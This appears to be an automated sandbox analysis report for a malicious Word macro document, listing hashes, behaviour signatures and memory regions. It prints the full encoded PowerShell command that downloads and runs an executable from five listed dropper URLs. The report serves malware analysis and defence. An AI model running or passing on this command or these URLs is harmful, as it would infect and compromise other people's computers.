Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 06:31

General

  • Target

    66522b920389fcb6d7ddf8808ba0a8ac_JaffaCakes118.doc

  • Size

    173KB

  • MD5

    66522b920389fcb6d7ddf8808ba0a8ac

  • SHA1

    f6dfa3ecc41e60d3672a66ea98e15ffb40ffbe64

  • SHA256

    6c15840ece51c9fef3afe93b089baaeb15b75128797ebd2bed4e8bd1f8c091a6

  • SHA512

    410dffc84077ba97781cff7de5418faa0c42825e9b3f606932af70a88afbcfc24f8e3ba13b8e43df7c4488e3d572ae1074893d88bc9161a194e8bbb5de6f7e5a

  • SSDEEP

    3072:g77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qxTkKJLHwVEjx5g8:g77HUUUUUUUUUUUUUUUUUUUT52VWTkKN

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://140.143.246.120/wp-content/5N_E/

exe.dropper

http://colegiodavinci.pe/wp-content/Q4_J/

exe.dropper

http://123.207.82.20/wp-includes/d_A/

exe.dropper

http://165.227.44.216/6bukewf/4_5/

exe.dropper

http://123.207.52.98/wp-content/O3_1/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\66522b920389fcb6d7ddf8808ba0a8ac_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABxADQAQQBRAG8ARABDAFoAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG8ANABCAEEAJwAsACcAagBBACcAKQA7ACQAWgBDADQAWABEAHcAPQBuAGAAZQBgAFcAYAAtAE8AYgBKAGUAQwB0ACAAKAAnAE4AZQAnACsAJwB0AC4AVwBlAGIAQwBsACcAKwAnAGkAZQAnACsAJwBuAHQAJwApADsAJAB0AEEAUQBCAGsAUQBYAFUAPQAoACIAewAxADkAfQB7ADQANAB9AHsANAAxAH0AewA4AH0AewAzADAAfQB7ADcAfQB7ADIAMgB9AHsANQB9AHsANAAwAH0AewAyAH0AewAzADIAfQB7ADIAOAB9AHsAMQA3AH0AewAyADkAfQB7ADMAMwB9AHsAMQAxAH0AewAyADUAfQB7ADQAMgB9AHsAMQAzAH0AewAzADQAfQB7ADEANAB9AHsANAAzAH0AewAyADMAfQB7ADMAOAB9AHsAMgA0AH0AewAzAH0AewA0AH0AewA5AH0AewAxADAAfQB7ADMAOQB9AHsAMwAxAH0AewAxADgAfQB7ADEANQB9AHsAMwA3AH0AewAxADIAfQB7ADQANQB9AHsAMwA2AH0AewAyADcAfQB7ADYAfQB7ADEANgB9AHsAMwA1AH0AewAxAH0AewAwAH0AewAyADEAfQB7ADIAMAB9AHsAMgA2AH0AewA0ADYAfQAiAC0AZgAnADIAMAA3ACcALAAnAC8ALwAxADIAMwAuACcALAAnAEAAJwAsACcALgAnACwAJwAyADAAJwAsACcANQAnACwAJwBfACcALAAnAGMAJwAsACcAMQA0ADAAJwAsACcALwB3AHAALQBpAG4AYwBsAHUAZAAnACwAJwBlAHMALwAnACwAJwBpACcALAAnAC4AMgAyACcALAAnAGMAbwBuAHQAJwAsACcALwBRADQAXwBKAC8AQABoAHQAdABwADoAJwAsACcALwAxADYAJwAsACcANQAnACwAJwBwADoALwAnACwAJwBwADoALwAnACwAJwBoAHQAdAAnACwAJwAuADkAOAAvAHcAcAAtAGMAbwAnACwAJwAuADUAMgAnACwAJwBvAG4AdABlAG4AdAAvACcALAAnADIAMwAuADIAJwAsACcAOAAyACcALAAnAC4AcABlAC8AJwAsACcAbgB0ACcALAAnAC8ANAAnACwAJwB0ACcALAAnAC8AYwBvAGwAZQBnAGkAbwBkAGEAJwAsACcALgAxADQAMwAuADIANAA2AC4AMQAyADAALwB3AHAALQAnACwAJwBfAEEALwBAAGgAdAB0ACcALAAnAGgAdAAnACwAJwB2AGkAbgBjACcALAAnAGUAbgB0ACcALAAnAC8AQABoAHQAdABwADoAJwAsACcAMQA2AC8ANgBiAHUAawBlAHcAZgAnACwAJwA1ACcALAAnADAANwAuACcALAAnAGQAJwAsACcATgBfAEUALwAnACwAJwAvAC8AJwAsACcAdwBwAC0AJwAsACcALwAvADEAJwAsACcAcAA6ACcALAAnADcALgA0ADQALgAyACcALAAnAGUAbgB0AC8ATwAzAF8AMQAvACcAKQAuACIAcwBQAGAAbABJAHQAIgAoACcAQAAnACkAOwAkAGoAQQA0AEQAQgBVADQAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAEQARAAnACwAJwBmAEIAJwAsACcAXwBBACcAKQA7ACQAcQBCAEEAQQBBAFEAWABRACAAPQAgACcANQA4ADMAJwA7ACQASwBBAEQAWgBRAEEARABfAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAawBCAEQAbwBBACcALAAnAFEAJwApADsAJABjAHcAdwBCAFoAQQBRAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABxAEIAQQBBAEEAUQBYAFEAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcALgBlACcALAAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABjAF8ANABBAEEAYwBBACAAaQBuACAAJAB0AEEAUQBCAGsAUQBYAFUAKQB7AHQAcgB5AHsAJABaAEMANABYAEQAdwAuACIARABgAE8AVwBOAEwAbwBgAEEAZABmAGAASQBMAGUAIgAoACQAYwBfADQAQQBBAGMAQQAsACAAJABjAHcAdwBCAFoAQQBRACkAOwAkAEgAXwBRAEEAWABRAGMAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAGYAJwAsACcAMQBBAEQAJwAsACcAQQBYADEAJwApADsASQBmACAAKAAoAEcAZQB0AC0AYABJAHQAZQBtACAAJABjAHcAdwBCAFoAQQBRACkALgAiAEwAYABlAG4ARwBUAGgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AGkAbgBgAFYAbwBrAGAAZQAtAEkAYABUAEUATQAgACQAYwB3AHcAQgBaAEEAUQA7ACQATwBYAFEAQgAxAFUAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAQQBRAEQAJwAsACcAVwB3AFEAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAeABBAEEANABaAHcAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBQAEEAJwAsACcAbwBBAHcAYwBBACcAKQA7AA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2556

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      99aa2c44cd6f8c9bd3d07aeb07bcc8e3

      SHA1

      5ea2d5f9585948132886dc20c6586ce94c02fb8d

      SHA256

      c4cb12f955696158bfe8b2e952fb759bd9a3c731e01c5e71b42aa76988e72458

      SHA512

      979fee3828e0d201273891e8121b2fe2f6abb96e66180df9a6441d2d461cd372e65087c5563dc2507ab121c3f5dd3e21f6aa68c48f353191a1287c945830bbe0

    • memory/2140-10-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/2140-2-0x00000000719ED000-0x00000000719F8000-memory.dmp

      Filesize

      44KB

    • memory/2140-7-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/2140-8-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/2140-9-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/2140-0-0x000000002F261000-0x000000002F262000-memory.dmp

      Filesize

      4KB

    • memory/2140-23-0x00000000719ED000-0x00000000719F8000-memory.dmp

      Filesize

      44KB

    • memory/2140-24-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/2140-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2140-41-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2140-42-0x00000000719ED000-0x00000000719F8000-memory.dmp

      Filesize

      44KB

    • memory/2556-17-0x000000001B460000-0x000000001B742000-memory.dmp

      Filesize

      2.9MB

    • memory/2556-18-0x0000000002A20000-0x0000000002A28000-memory.dmp

      Filesize

      32KB